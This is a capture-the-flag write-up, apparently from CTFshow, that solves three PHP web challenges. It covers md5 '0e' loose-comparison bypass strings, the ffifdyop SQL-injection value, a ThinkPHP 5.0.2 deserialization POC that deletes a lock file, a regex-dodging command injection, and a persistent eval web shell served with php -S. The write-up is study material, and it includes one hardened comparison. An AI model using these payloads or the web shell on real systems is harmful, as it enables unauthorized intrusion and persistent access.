web签到 (Web sign-in)
<?php
//Author:H3h3QAQ
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET["YBB"])) {
    if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) {
        echo "小伙子不错嘛!!flag给你了:" . $flag;
    } else {
        echo "偶吼,带黑阔被窝抓到了!!!!";
    }
}
The fake PoC
<?php
// Brute-force small integers whose md5 loosely compares equal to themselves.
for ($a = 1; $a < 10000; $a++) {
    if (hash("md5", $a) == $a) {
        echo $a . PHP_EOL;
        echo hash("md5", $a);
        break;
    }
}
Output:
92
92cc227532d17e56e07902b254dfad10
The 92 the script finds is an int, but what we pass in via GET arrives as a string, and then the comparison no longer holds. So 92 does not work.
The real PoC
<?php
// Search for a "0e<digits>" string whose md5 loosely compares equal to it.
$str = "0e";
for ($i = 0; $i <= 10000000000; $i++) {
    $md5 = $str . $i;
    if (hash("md5", $md5) == $md5) {
        echo $md5;
        break;
    }
}

The same search, written more compactly:

<?php
for ($i = 0; $i <= 10000000000; $i++) {
    if (hash("md5", "0e" . $i) == "0e" . $i) {
        echo "0e" . $i;
        break;
    }
}
We need to pass in 0e215962017, which compares equal to its own md5: the md5 of 0e215962017 also starts with 0e. Passing it in therefore yields the flag.
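As an added example (not code from the challenge or this write-up), here is the challenge's loose comparison next to a fixed version, plus a helper that makes the reason for the 0e bypass explicit. The sample inputs are constructed for the demo (the magic value is the one from the write-up), and the md5 value in the comment is the well-known hash of that string.

```php
<?php
// Added example, not part of the challenge: why hash("md5", $x) == $x
// can be bypassed and what the fixed comparison looks like. Runs on PHP 7 and 8.

// Vulnerable check, the same shape as the challenge code.
function check_loose(string $input): bool
{
    return hash("md5", $input) == $input;
}

// Hardened check: hash_equals compares the two strings byte by byte
// (in constant time), so no numeric coercion happens.
function check_strict(string $input): bool
{
    return hash_equals(hash("md5", $input), $input);
}

// Why the loose check fails: PHP treats "0e<digits>" as a numeric string
// equal to 0 * 10^N == 0.0. If both the input and its md5 have that shape,
// == compares 0.0 with 0.0 and returns true (PHP 8 kept this rule for two
// numeric strings). This helper reports exactly that condition.
function is_zero_e_collision(string $input): bool
{
    $zeroE = '/^0e[0-9]+$/';
    return preg_match($zeroE, $input) === 1
        && preg_match($zeroE, hash("md5", $input)) === 1;
}

// Constructed sample inputs for the demo.
$samples = [
    "0e215962017", // magic value from the write-up; md5 = 0e291242476940776845150308577824
    "92",          // the "fake PoC" value as it arrives through GET (a string)
    "hello",       // ordinary input
];

foreach ($samples as $s) {
    printf("%-14s loose=%-5s strict=%-5s zero_e=%s\n",
        $s,
        var_export(check_loose($s), true),
        var_export(check_strict($s), true),
        var_export(is_zero_e_collision($s), true));
}
```

Only the magic value passes check_loose, and none of the inputs pass check_strict, which is the behaviour a login or token check should have.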
0e bypass under double md5
The following strings start with 0e after being md5'd twice:
7r4lGXCH2Ksu2JNT3BYM
CbDLytmyGm2xQyaLNhWn
770hQgrBOjrcqftrlaZk
md5 + SQL injection
Use ffifdyop: after md5 followed by hex2bin it becomes 'or'6�]��!r,��b (the non-printable bytes are shown as �), which bypasses the login via SQL injection.
eztp
Code audit
<?php
namespace app\index\controller;

class Index
{
    public function index($run = [])
    {
        highlight_file(__FILE__);
        echo '<h1>Welcome to CTFSHOW</h1></br>';
        echo 'Powered by PHPthink5.0.2</br>';
        echo dirname(__FILE__);
        if (!empty($run[2])) {
            echo 'ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ=';
        }
        if (!empty($run[1])) {
            unserialize($run[1]);
        }
    }

    // hint:/index/index/backdoor
    public function backdoor()
    {
        if (!file_exists(dirname(__FILE__) . '/../../' . "install.lock")) {
            echo "Try to post CMD arguments" . '<br/>';
            $data = input('post.');
            if (!preg_match('/flag/i', $data['cmd'])) {
                $cmd = escapeshellarg($data['cmd']);
                $cmd = 'cat ' . $cmd;
                echo $cmd;
                system($cmd);
            } else {
                echo "No No No";
            }
        } else {
            echo dirname(__FILE__) . '/../../' . "install.lock has not been deleted";
        }
    }
}
ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ= decodes to: flag is not here but it is in flag.txt
A note for the record: the challenge environment is not configured to hide the entry file, so index.php has to be included in the path:
http://b756b813-79f6-4683-a477-5a70667dd38e.challenge.ctf.show/index.php/index/index/backdoor
The backdoor gives command execution, but install.lock has to be deleted first, so we turn to the deserialization vulnerability in ThinkPHP 5.0.2 (the banner calls it PHPthink5.0.2).
POC
<?php
namespace think\process\pipes;

use think\Process;

class Pipes {}

class Windows extends Pipes
{
    private $files = [];

    function __construct()
    {
        $this->files = ["/var/www/html/application/index/controller/../../install.lock"];
    }
}

echo urlencode(serialize(new Windows())) . "\n";
?>
O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fvar%2Fwww%2Fhtml%2Fapplication%2Findex%2Fcontroller%2F…%2F…%2Finstall.lock%22%3B%7D%7D
$data = input('post.');
if (!preg_match('/flag/i', $data['cmd'])) {
    $cmd = escapeshellarg($data['cmd']);
    $cmd = 'cat ' . $cmd;
    echo $cmd;
    system($cmd);
Here escapeshellarg wraps cmd in quotes, so the wildcard * no longer works; the full name flag has to be supplied to read the file.
POST body: cmd=/fl%97ag
Response:
cat '/flag'
ctfshow{6561934e-d3cb-466f-93b9-4c22bb4a8af8}
The encoded special byte neatly dodges the /flag/i regex, while the command still runs on Linux and reads the flag: as the echoed command shows, it ends up as cat '/flag'.
不要离开我 (Don't leave me)
<?php
// Challenge description:
// Find a way to keep your access. Once you are sure it works, submit check;
// the flag is generated only after the check passes and does not exist before that.
error_reporting(0);
highlight_file(__FILE__);
$a = $_GET['action'];
switch ($a) {
    case 'cmd':
        eval($_POST['cmd']);
        break;
    case 'check':
        file_get_contents("http://checker/api/check");
        break;
    default:
        die('params not validate');
}

Visiting the page without an action parameter prints: params not validate
Approach: write a backdoor into another directory, then after the check, start PHP's built-in web server and reach the backdoor to get a shell. A delay is needed here.
cmd=file_put_contents("/tmp/index.php","<?php eval(\$_POST['1']); ?>");
cmd=system("cat /tmp/index.php");
The \ is needed here to escape the $. Also, to inspect the file, view the page source; otherwise the PHP tag is parsed as markup and hidden.
cmd=system("sleep 10 && php -S 0.0.0.0:80 -t /tmp/");
Payload: this can be sent as separate requests or merged into a single payload:
cmd=file_put_contents("/tmp/index.php","<?php eval(\$_POST['a']);?>");system("sleep 10 %26%26 php -S 0.0.0.0:80 -t /tmp/");
Quickly submit the check request to generate the flag, then access the backdoor directly and cat /flag_ssk.txt.